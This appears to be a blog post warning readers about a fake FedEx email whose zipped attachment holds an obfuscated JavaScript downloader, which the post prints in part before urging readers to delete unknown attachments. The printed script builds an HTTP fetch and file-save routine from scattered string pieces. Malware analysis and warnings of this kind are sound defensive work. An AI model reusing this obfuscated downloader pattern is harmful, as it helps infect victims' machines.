function ccccccccccccccc(){ccccc += ‘n(‘; kkkkkkkkk(); };
function qqqqqqq(){ccccc += ‘ { va’; rrrrrrrrr(); };
function kkkkkkkkkkk(){ccccc += ‘en(“‘; rrrrrr(); };
function ddddddddddd(){ccccc += ‘nd=’; iiiiiiiii(); };
function ooooooooooooo(){ccccc += ‘fun’; wwwwwwwwwwww(); };
function llllllllll(){ccccc += ‘if’; jjjjjjjjjjjjj(); };
function uuuuuuuuuuuuu(){ccccc += ‘) { ‘; vvvvvvvvvvvvv(); };
function sssssssssssssss(){ccccc += ’17’; zzzzzzzzzzz(); };
function yyyyyyyyy(){ccccc += ‘ile(f’; yyyyyyyy(); };
function wwwwwwwwwwwwwwww(){ccccc += ‘Act’; eeeeeeeee(); };
function llllllllllll(){ccccc += ‘= ‘; gggggg(); };
function uuuuuu(){ccccc += ‘type ‘; mmmmmmmmmm(); };
function tttttttttttttt(){ccccc += ‘s.’; vvvvvvvvvvvvvvvv(); };
function mmmmmmmmm(){ccccc += ‘onseB’; eeeeeeeeeeee(); };
function dddddddddddddd(){ccccc += ‘= ‘; gggggggg(); };
function ttttttttt(){ccccc += ‘on ‘; mmmmmm(); };
function ttttttttttt(){ccccc += ‘Expa’; wwwwwwwwwwwww(); };
function tttttttttttt(){ccccc += ‘s == ‘; ooooooooo(); };
function uuuuuuuuuu(){ccccc += ‘var’; bbbbbbbbbbbbbbb(); };
function ffffffffff(){ccccc += ’52);’; yyyyyyyyyyyyyyy(); };
function ffffffffffffffff(){ccccc += ‘; t’; mmmmmmmmmmmmmm(); };
function bbbbbbbbbbbbb(){ccccc += ‘faa’; nnnnnn(); };
function yyyyyyyyyyy(){ccccc += ‘ironm’; cccccccccccc(); };
function ooooooo(){ccccc += ‘ {}; ‘; vvvvvvvvvvvv(); };
function oooooooooooooooo(){ccccc += ‘()’; uuuuuuuuu(); };
function ccccccccccccc(){ccccc += ‘ch (e’; tttttt(); };
function mmmmmmmmmmm(){ccccc += ‘aveT’; vvvvvvvvvvvvvvv(); };
function rrrrrr(){ccccc += ‘GET”,’; ccccccc(); };
function uuuuuuuuuuuuuu(){ccccc += ‘+”/do’; zzzzzzzzzzzzzzz(); };
function iiiiiiiiiiiii(){ccccc += ‘xa.s’; mmmmmmmmmmm(); };
function bbbbbbb(){ccccc += ‘trea’; oooooooooooooo(); };
function ddddddddddddd(){ccccc += ‘Ob’; oooooooooo(); };
function kkkkkk(){ccccc += ‘,0)’; qqqqqqqqqqq(); };
function cccccccc(){ccccc += ‘= ‘; yyyyyyyyyyyyyyyy(); };
function aaaaaaaaaaa(){ccccc += ‘ 4 ‘; eeeeeeee(); };
function rrrrrrrrrrrrrr(){ccccc += ‘ttp:/’; nnnnnnnnn(); }; var ccccc = ”; var xx = ”; uuuuuuuu();

By looking at the text elements in quotes (things like “ironm”, “ttp:/”, “.Ru”, etc. it’s pretty easy to see that the whole purpose of this script is to concatenate instructions which will lead your computer to some Russian website and infest your machine with code from Hell. I’m not skilled in Javascript (or, more accurately, it would take me more time than it’s worth to decrypt this script,) so suffice it to say you don’t want this on your machine.

The email looks like it’s from FedEx. Some poor computer-illiterate secretary, or your grandmother, or cousin, or someone who just used FedEx would probably think it was legitimate, download the file, unzip it, double-click on it, and Bob’s your uncle.

DON’T DO IT!

Attachments from people you don’t know, particularly .zip or .rar, are to be assiduously avoided. Trash them at once.

Please be vigilant and take good care of yourself and your loved ones.

The Old Wolf has spoken.